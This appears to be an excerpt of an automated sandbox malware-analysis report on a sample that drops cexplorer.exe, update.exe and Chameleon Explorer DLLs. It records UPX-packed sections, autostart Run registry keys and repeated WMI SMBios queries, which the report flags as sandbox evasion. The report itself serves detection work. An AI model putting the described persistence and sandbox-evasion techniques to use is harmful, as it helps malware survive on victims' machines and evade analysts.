Source: C:\Users\user\AppData\Roaming\cexplorer.exe	Code function: 6_2_004064A6 push 0040650Dh; ret	6_2_00406505
Source: C:\Users\user\AppData\Roaming\cexplorer.exe	Code function: 6_2_004064A8 push 0040650Dh; ret	6_2_00406505
Source: C:\Users\user\AppData\Roaming\cexplorer.exe	Code function: 6_2_004034A8 push eax; ret	6_2_004034E4
Source: C:\Users\user\AppData\Roaming\cexplorer.exe	Code function: 6_2_0041157C push 004115FAh; ret	6_2_004115F2
Source: C:\Users\user\AppData\Roaming\cexplorer.exe	Code function: 6_2_0040DD38 push 0040DD7Bh; ret	6_2_0040DD73
Source: C:\Users\user\AppData\Roaming\cexplorer.exe	Code function: 6_2_00411618 push 00411645h; ret	6_2_0041163D
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_00500B48 push 00500BCEh; ret	7_2_00500BC6
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_004CC0F4 push 004CC12Ch; ret	7_2_004CC124
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_004AC17C push ecx; mov dword ptr [esp], eax	7_2_004AC181
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_004CC1E8 push 004CC235h; ret	7_2_004CC22D
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_0044C1F4 push 0044C220h; ret	7_2_0044C218
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_0045C2C4 push ecx; mov dword ptr [esp], ecx	7_2_0045C2C8
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_004542FC push 00454367h; ret	7_2_0045435F
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_004CC364 push 004CC39Ch; ret	7_2_004CC394
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_0049C374 push ecx; mov dword ptr [esp], ecx	7_2_0049C378
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_004D8400 push ecx; mov dword ptr [esp], edx	7_2_004D8401
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_004204B0 push 004204FDh; ret	7_2_004204F5
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_00438544 push 00438570h; ret	7_2_00438568
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_0050057C push 005005FAh; ret	7_2_005005F2
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_00500638 push 005006E0h; ret	7_2_005006D8
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_005006EC push 0050077Ch; ret	7_2_00500774
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_004B4754 push 004B479Eh; ret	7_2_004B4796

Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp

Code function: 7_2_004A1A3C LoadLibraryExW,LoadLibraryW,GetProcAddress,

7_2_004A1A3C

Source: is-MIQ4J.tmp.7.dr	Static PE information: section name: .didata
Source: is-NOOMK.tmp.7.dr	Static PE information: section name: .didata
Source: is-BP5O1.tmp.7.dr	Static PE information: section name: .didata
Source: is-T1IK9.tmp.7.dr	Static PE information: section name: .didata
Source: is-T1IK9.tmp.7.dr	Static PE information: section name: JCLDEBUG
Source: is-FAUA3.tmp.7.dr	Static PE information: section name: .didata
Source: is-FAUA3.tmp.7.dr	Static PE information: section name: JCLDEBUG
Source: is-M2PIB.tmp.7.dr	Static PE information: section name: .didata
Source: is-0AE3R.tmp.7.dr	Static PE information: section name: .didata
Source: Folder.dll_backup.13.dr	Static PE information: section name: .didata
Source: Folder.dll.13.dr	Static PE information: section name: .didata
Source: Folder64.dll_backup.13.dr	Static PE information: section name: .didata
Source: Folder64.dll.13.dr	Static PE information: section name: .didata
Source: ExplorerHelper32.dll.14.dr	Static PE information: section name: .didata
Source: ExplorerHelper32.dll_backup.14.dr	Static PE information: section name: .didata
Source: ExplorerHelper64.dll.14.dr	Static PE information: section name: .didata
Source: ExplorerHelper64.dll_backup.14.dr	Static PE information: section name: .didata

Source: initial sample

Static PE information: section name: .text entropy: 6.89085450297

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	File created: C:\Program Files (x86)\Chameleon Explorer\Folder.dll_backup	Jump to dropped file
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	File created: C:\Program Files (x86)\Chameleon Explorer\Folder64.dll_backup	Jump to dropped file
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	File created: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_backup	Jump to dropped file
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	File created: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll_backup	Jump to dropped file

Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	File created: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_backup	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	File created: C:\Users\user\AppData\Local\Temp\is-CO8MN.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	File created: C:\Program Files (x86)\Chameleon Explorer\Folder64.dll_backup	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	File created: C:\Program Files (x86)\Chameleon Explorer\is-MIQ4J.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	File created: C:\Program Files (x86)\Chameleon Explorer\is-M2PIB.tmp	Jump to dropped file
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	File created: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	File created: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_new (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	File created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\0331C7BCA665F36513377FC301CBB32822FF35F925115.exe	File created: C:\Users\user\AppData\Roaming\update.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	File created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	File created: C:\Program Files (x86)\Chameleon Explorer\Folder64.dll_new (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	File created: C:\Program Files (x86)\Chameleon Explorer\is-NOOMK.tmp	Jump to dropped file
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	File created: C:\Program Files (x86)\Chameleon Explorer\Folder.dll_backup	Jump to dropped file
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	File created: C:\Program Files (x86)\Chameleon Explorer\Folder.dll	Jump to dropped file
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	File created: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	File created: C:\Program Files (x86)\Chameleon Explorer\is-0AE3R.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	File created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	File created: C:\Program Files (x86)\Chameleon Explorer\Folder.dll_new (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\0331C7BCA665F36513377FC301CBB32822FF35F925115.exe	File created: C:\Users\user\AppData\Roaming\cexplorer.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\cexplorer.exe	File created: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Jump to dropped file
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	File created: C:\Program Files (x86)\Chameleon Explorer\Folder64.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	File created: C:\Program Files (x86)\Chameleon Explorer\is-BP5O1.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	File created: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll_new (copy)	Jump to dropped file
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	File created: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll_backup	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	File created: C:\Program Files (x86)\Chameleon Explorer\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	File created: C:\Program Files (x86)\Chameleon Explorer\is-VD36P.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	File created: C:\Program Files (x86)\Chameleon Explorer\is-T1IK9.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	File created: C:\Program Files (x86)\Chameleon Explorer\is-FAUA3.tmp	Jump to dropped file

Boot Survival:

Creates multiple autostart registry keys

Show sources

Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Chameleon Folder			Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Chameleon Explorer			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Chameleon Explorer			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Chameleon Explorer\Chameleon Explorer.lnk			Jump to behavior

Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Chameleon Explorer	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Chameleon Explorer	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Chameleon Folder	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Chameleon Folder	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_00470AAC GetWindowLongW,IsIconic,IsWindowVisible,ShowWindow,SetWindowLongW,SetWindowLongW,ShowWindow,ShowWindow,	7_2_00470AAC
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_004736F8 IsIconic,SetFocus,GetParent,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,	7_2_004736F8
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_00470A2C IsIconic,	7_2_00470A2C
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_00481238 IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,MessageBoxW,SetActiveWindow,	7_2_00481238
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_0042DBCC IsIconic,GetWindowPlacement,GetWindowRect,	7_2_0042DBCC
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_004E6860 IsIconic,GetWindowLongW,ShowWindow,ShowWindow,	7_2_004E6860
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_004629EC IsIconic,GetCapture,	7_2_004629EC
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_0046335C IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	7_2_0046335C

Source: C:\Users\user\AppData\Roaming\update.exe

Code function: 8_2_00417216 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,

8_2_00417216

Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Users\user\Desktop\0331C7BCA665F36513377FC301CBB32822FF35F925115.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0331C7BCA665F36513377FC301CBB32822FF35F925115.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0331C7BCA665F36513377FC301CBB32822FF35F925115.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cexplorer.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Queries sensitive service information (via WMI, MSSMBios_RawSMBiosTables, often done to detect sandboxes)

Show sources

Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
